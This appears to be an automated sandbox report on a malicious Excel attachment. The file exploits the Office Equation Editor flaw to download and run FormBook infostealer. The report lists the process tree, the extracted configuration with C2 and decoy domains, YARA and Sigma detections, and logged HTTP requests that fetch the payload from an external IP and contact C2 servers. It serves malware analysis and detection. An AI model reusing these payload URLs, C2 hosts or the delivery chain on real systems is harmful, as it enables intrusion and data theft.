Windows Analysis Report New order - C.S.I No. 04183.xlsx

Overview

General Information

Sample Name: New order - C.S.I No. 04183.xlsx
Analysis ID: 528788
MD5: bc2d171f6ea23a58ce5cca820869295c
SHA1: dafd3a3276c12ee6d20206573d65d6fb10e6af7b
SHA256: 408c41f67cc40208f1518b050db8b6d0f315dae817e26c5ae43efe917506c226
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1912 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2680 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2868 cmdline: "C:\Users\Public\vbc.exe" MD5: 4D1B51FE258BE32D346B3507ABEDDCB3)
      • vbc.exe (PID: 1292 cmdline: "C:\Users\Public\vbc.exe" MD5: 4D1B51FE258BE32D346B3507ABEDDCB3)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cscript.exe (PID: 2216 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
            • cmd.exe (PID: 772 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.celikkaya.xyz/og2w/"], "decoy": ["drivenexpress.info", "pdfproxy.com", "zyz999.top", "oceanserver1.com", "948289.com", "nubilewoman.com", "ibizadiamonds.com", "bosniantv-australia.com", "juliehutzell.com", "poshesocial.events", "icsrwk.xyz", "nap-con.com", "womansslippers.com", "invictusfarm.com", "search-panel-avg-rock.rest", "desencriptar.com", "imperialexoticreptiles.com", "agastify.com", "strinvstr.com", "julianapeloi.com", "myproperty99.com", "mahardikasantoso.com", "pathway-strategies.com", "runbusinessonline.com", "facenbook.xyz", "texasschnauzer.com", "whoyummy.top", "hiscomsvc.com", "644557.com", "shouyeshow.com", "emtek.site", "inspireabossglobal.us", "sellmyhouse365.net", "ambergrids.xyz", "shoptrendyshop.com", "b7eb8.com", "crystalsbyzoe.com", "awfullive.site", "rebelgreens.com", "depressiqwidv.xyz", "mvp69bet.com", "selectedandprotected.com", "china-jiahe.com", "brandonknicely.com", "redrodventuresllc.com", "tomafer.net", "makemeorgasm.net", "wihomeoffers.com", "bamko.link", "secure-01.net", "fridayhabit.com", "mudeevehkuwpitcicet.site", "inversioneskomp.com", "oojry.xyz", "jibony.com", "cellphoneplansiusaweb.com", "lianemuhill.com", "caroeventos.com", "thucphamsachkhaihuy.com", "musicjem.com", "hbbtv.xyz", "meltemilebaskalasim.com", "xn--38j0b6c.com", "checkupfromtheneckup.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.2980000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.2.vbc.exe.2980000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          Exploits:

          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network Connection, Author: Joe Security, Data: DestinationIp: 103.171.1.140, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2680, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2680, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe

          System Summary:

          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2680, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2868
          Sigma detected: Execution from Suspicious Folder
          Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2680, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2868

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration)
          Multi AV Scanner detection for submitted file
          Source: New order - C.S.I No. 04183.xlsx, Virustotal: Detection: 36%
          Source: New order - C.S.I No. 04183.xlsx, ReversingLabs: Detection: 36%
          Yara detected FormBook
          Source: Yara match, File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://103.171.1.140/384500000_1/.vbc.exe, Avira URL Cloud: Label: malware
          Source: http://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN, Avira URL Cloud: Label: phishing
          Multi AV Scanner detection for domain / URL
          Source: http://103.171.1.140/384500000_1/.vbc.exe, Virustotal: Detection: 8%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll, Joe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe, Joe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.2980000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cscript.exe.3e22f0.0.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cscript.exe.2a4f840.7.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.459887685.00000000002B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495263706.00000000008C0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.460925066.00000000005B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000003.494990015.00000000004B0000.00000004.00000001.sdmp, cscript.exe, 00000007.00000002.663624666.0000000002490000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.495952417.0000000002180000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
          Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00405250
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_00405C22 FindFirstFileA,FindClose,4_2_00405C22
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402630 FindFirstFileA,4_2_00402630
          Source: global traffic, DNS query: name: www.oojry.xyz
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_2_00416CDC
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_1_00416CDC
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop edi, 7_2_00086CDC
          Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 103.171.1.140:80

          Networking:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 104.21.82.75 80
          Source: C:\Windows\explorer.exe, Domain query: www.oojry.xyz
          Source: C:\Windows\explorer.exe, Domain query: www.crystalsbyzoe.com
          Source: C:\Windows\explorer.exe, Network Connect: 34.246.239.131 80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe, DNS query: www.oojry.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.celikkaya.xyz/og2w/
          Source: Joe Sandbox View, ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global traffic, HTTP traffic detected: GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1 | Host: www.oojry.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1 | Host: www.crystalsbyzoe.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 25 Nov 2021 18:23:23 GMT | Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31 | Last-Modified: Thu, 25 Nov 2021 04:13:29 GMT | ETag: "7431e-5d195326272a0" | Accept-Ranges: bytes | Content-Length: 475934 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
          Source: global traffic, HTTP traffic detected: GET /384500000_1/.vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 103.171.1.140 | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Type: text/html | Date: Thu, 25 Nov 2021 18:25:03 GMT | Server: nginx | Vary: Accept-Encoding | Content-Length: 159 | Connection: Close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.17.8.2</center></body></html>
          Source: unknown, TCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.dr, String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.dr, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.484932398.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662313228.0000000001E70000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.500166360.0000000001E70000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469685487.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.531572707.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C56E6BA.emf
          Source: unknown DNS traffic detected: queries for: www.oojry.xyz
          Source: global traffic HTTP traffic detected:
              GET /384500000_1/.vbc.exe HTTP/1.1
